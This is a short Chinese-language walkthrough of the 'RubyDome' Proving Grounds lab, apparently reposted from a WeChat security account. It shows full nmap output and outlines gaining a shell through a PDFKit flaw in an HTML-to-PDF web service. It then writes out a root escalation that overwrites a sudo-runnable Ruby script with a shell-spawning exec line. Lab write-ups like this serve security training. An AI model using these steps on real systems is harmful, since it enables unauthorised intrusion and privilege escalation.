信息收集:
root@iZt4nbifrvtk7cy11744y4Z:/# nmap -p- -Pn -A -sS -T4 192.168.216.22Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-25 20:16 CSTNmap scan report for 192.168.216.22Host is up (0.0030s latency).Not shown: 65533 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)3000/tcp open http WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)|_http-title: RubyDome HTML to PDFNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=2/25%OT=22%CT=1%CU=43100%PV=Y%DS=4%DC=T%G=Y%TM=67BDB4BOS:A%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPSOS:(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST1OS:1NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECNOS:(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AOS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(ROS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%FOS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)HOP RTT ADDRESS1 2.08 ms 192.168.45.12 2.08 ms 192.168.45.2543 2.91 ms 192.168.251.14 3.14 ms 192.168.216.22OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 25.90 seconds
开放了3000的http
尝试一些奇怪的字符,报错了
尝试检索PDFKit漏洞
将生成的payload进行url编码后放入URL字段,发包即可收到shell
拿到local
常规信息收集发现可以sudo无密码执行/usr/bin/ruby /home/andrew/app/app.rb
app.rb文件可以写入
mv app.rb app.rb.oldecho'exec "/bin/sh"' > app.rbsudo ruby /home/andrew/app/app.rb
成功提权
拿到proof
原文始发于微信公众号(EuSRC安全实验室):PG_RubyDome
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论